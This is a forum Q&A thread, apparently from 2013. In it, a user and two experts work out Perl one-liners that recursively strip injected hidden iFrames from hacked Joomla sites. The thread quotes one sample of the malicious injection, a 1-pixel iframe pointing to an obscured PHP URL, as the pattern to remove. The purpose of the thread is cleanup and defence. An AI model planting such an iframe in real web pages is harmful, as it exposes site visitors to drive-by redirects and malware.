Solved

Regex Problem Using Perl One-liner

Posted on 2013-05-16
Last Modified: 2013-05-19
I am trying to help a friend sort out a problem with some websites that he administers. These are Joomla sites, and he has found that the files for each site have been hacked and iFrames injected. He wants to remove these dubious iFrames from all the sites and asked if I could provide some code that he could run as a command over SSH.

A search of the web showed that one way of removing these was to use grep and sed, but my knowledge of bash is limited and I'm much more knowledgeable with Perl, so I looked for a Perl solution. The offending code is of the form

<!-- . --><iframe width="1px" height="1px" src= "http://abcd/fghi/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
<!-- . -->
I thought that there might be some other legitimate iFrames on the site, so I set about producing some code that would remove the <!-- . --> tags and the iFrames within them, and produced the following one-line Perl code:

perl -pi.bak -e '$pattern="<!-- . -->"; s/$pattern.+?$pattern//gs' `find . -name "*" -type f`
The first problem I came across was that this didn't find the offending code, although I had included the 's' option to treat everything as a single line. The regex I was using worked perfectly well in a normal Perl script, and the problem seemed to be due to the fact that the file I had been given to test had CRLF line endings. I used another one-liner to change all line endings to LF and tried my code again.

The code now seemed to work all right in removing the offending code. However when I tried it on a file that had two lots of that bad code it didn’t remove both bits despite the ‘g’ option in the regex, and in fact it didn’t remove the first bit properly.

Can someone explain why this code didn't work with the CRLF line endings, and also why the global version didn't remove all the bad code? Can I make any change to the one-liner so that it works properly?
Question by:RobbieSnr
20 Comments
 
LVL 26

Expert Comment

by:wilcoxon
ID: 39172277
perl -p explicitly loops over each line in the input file.  You need to slurp the file in and manipulate it as a file.  Something like:
perl -i.bak -e '$/ = undef; $f = <>; $pattern = "<!-- . -->"; $f =~ s{$pattern.+?$pattern}{}gs; print $f' `find . -name "*" -type f`

 

Author Comment

by:RobbieSnr
ID: 39172536
Very quick and simple solution to my problem.
 

Author Comment

by:RobbieSnr
ID: 39172555
Many thanks for this quick reply. I used -MO=Deparse to find out what was happening, and I should have realised that the <> was just bringing in one line at a time and checking only that.

My friend will be very happy when I give him the revised code - he has to remove the offending code from 29 different websites.
 
LVL 84

Accepted Solution

by:
ozo earned 300 total points
ID: 39172966
perl -0777 -pi.bak -e '$pattern="<!-- . -->"; s/$pattern.+?$pattern//gs' `find .  -type f`
 

Author Comment

by:RobbieSnr
ID: 39173134
I had seen this -0777 parameter used but didn't register just what it did. I see from a Google search that it slurps the whole file into the $_ variable so this is another way to produce the result I wanted, thanks.
 

Author Comment

by:RobbieSnr
ID: 39174221
Oh dear, I've been too hasty, neither solution is working as I want it to.

I produced two files, index.html and index2.html. The first one contained that piece of offending iFrame and then I duplicated it, to check that both iFrames would be removed, and this had CRLF endings. The second was identical but with LF endings. I'm attaching both files. I also duplicated the files in subfolders, just to check that the one-liner was working recursively correctly.

I first of all tried to run the code in the main folder by replacing the back-ticked 'find' with * so as not to change the subfolders. The version from ozo did remove the iFrames from both files, with the expected warning about not being able to do anything with the folders in that main folder. However, all the line endings were removed, which I didn't want to happen. I then tried the version with the 'find' and it did work recursively all right, but with the same problem with the line endings.

I next tried wilcoxon's version, again changing the back ticked 'find' with a *. This removed the iFrames from the index.html file but left the other unchanged, and there was no warning about the folders. As with ozo's version all the line endings had been removed. I then tried the version with the 'find' but it did nothing at all.

Help!
index.html
index2.html
 
LVL 84

Expert Comment

by:ozo
ID: 39174261
The only line endings that are removed are the ones between the <!-- . -->  <!-- . -->
along with everything else removed between the  <!-- . -->  <!-- . -->
If, instead of removing everything, you want to replace it with \n or \r\n,
you can do
s/$pattern.+?$pattern/\r\n/gs
 
LVL 84

Expert Comment

by:ozo
ID: 39174291
Without the -p there is no loop around the code, so it only slurps one file
 
LVL 26

Expert Comment

by:wilcoxon
ID: 39175037
Good point.  I forgot about that part.  Hopefully, this version will fix that.
perl -i.bak -e '$/ = undef; while (@ARGV) { $f = <>; $pattern = "<!-- . -->"; $f =~ s{$pattern.+?$pattern}{}gs; print $f; shift @ARGV; }' `find . -name "*" -type f`



Otherwise, it gets longer...
perl -i.bak -e '$/ = undef; foreach my $n (@ARGV) { open(IN,$n) or die $!; $f = <IN>; close IN; $pattern = "<!-- . -->"; $f =~ s{$pattern.+?$pattern}{}gs; print $f' `find . -name "*" -type f`

 
LVL 26

Expert Comment

by:wilcoxon
ID: 39175043
If the -0777 works for you, it will produce shorter code than my solution (but both should work).  The only problem I can think of with it is if any of the files are any form of unicode (0777 is a valid unicode character so could malfunction).
 

Author Comment

by:RobbieSnr
ID: 39175256
Hi ozo, I don't know what I was thinking about when I said the line endings were all removed; of course, as you say, the only ones in the examples were within the code I wanted to remove. Your code works as it should, sorry about doubting that!

You mentioned that there was no looping in wilcoxon's original code. I did try just adding the 'p' but that didn't work.

Wilcoxon, thanks for the other two suggestions. I've tried both - the first one for some reason or other just adjusts the second file, index2.html, in all the folders but leaves the first ones untouched. Your second one failed to compile because of a missing bracket, and I couldn't work out where it should be placed.
 
LVL 26

Expert Comment

by:wilcoxon
ID: 39175903
The bracket in the second version should go at the end of the perl code section:
perl -i.bak -e '$/ = undef; foreach my $n (@ARGV) { open(IN,$n) or die $!; $f = <IN>; close IN; $pattern = "<!-- . -->"; $f =~ s{$pattern.+?$pattern}{}gs; print $f }' `find . -name "*" -type f`

 
LVL 84

Expert Comment

by:ozo
ID: 39176329
-p adds
  while( <> ){
     ...  
  }continue{ print or die "-p destination: $!\n"; }
around your program
so if you use it,  the $f = <>; and print $f are uncalled-for
You should either include the loop in your own code, or use the <> and print from the -p loop
 
LVL 26

Assisted Solution

by:wilcoxon
wilcoxon earned 200 total points
ID: 39177788
Based on ozo's comment about what -p adds and some testing, this will work (and is slightly simpler than my previous answer):
perl -i.bak -e '$/ = undef; while (<>) { $pattern = "<!-- . -->"; s{$pattern.+?$pattern}{}gs; print }' `find . -name "*" -type f`



-0777 will work fine in most instances but I'm not a big fan of non-obvious behaviors with hidden gotchas (eg -0777 will choke on (some) unicode files).
 
LVL 84

Expert Comment

by:ozo
ID: 39177957
Actually, if you want to use a 777 as a Unicode line separator you'd have to specify it as -0x1FF
 
LVL 26

Expert Comment

by:wilcoxon
ID: 39177970
Is that a recent change?  I know you used to be able to specify octal 777 (and hex 0x1FF will have the same potential issue - it's a valid unicode character (though likely uncommon depending on which unicode encoding the file uses)).
 
LVL 84

Expert Comment

by:ozo
ID: 39177997
It looks like it's been there since 2003
http://www.nntp.perl.org/group/perl.perl5.changes/2003/04/msg7155.html
If you want to slurp the whole file, you can use -0777, same as pre-Unicode
If you want to separate lines with ǿ (latin small letter o with stroke and acute), you can use -0x1FF
 
LVL 84

Expert Comment

by:ozo
ID: 39178004
You should also use
perl -Mopen=:utf8
for Unicode files
 

Author Closing Comment

by:RobbieSnr
ID: 39179713
Many thanks to both of you for your help in finding a solution to my problem, and for the interesting information about how these one-liners work.

I was too hasty in taking wilcoxon's initial solution without checking that it provided the solution I required, and then ozo's one worked (despite my thinking initially that there was a problem with missing line endings!). Ozo's one was more concise and worked perfectly with the websites that had to be amended, so I have split the points, giving ozo 100 more than wilcoxon for this reason.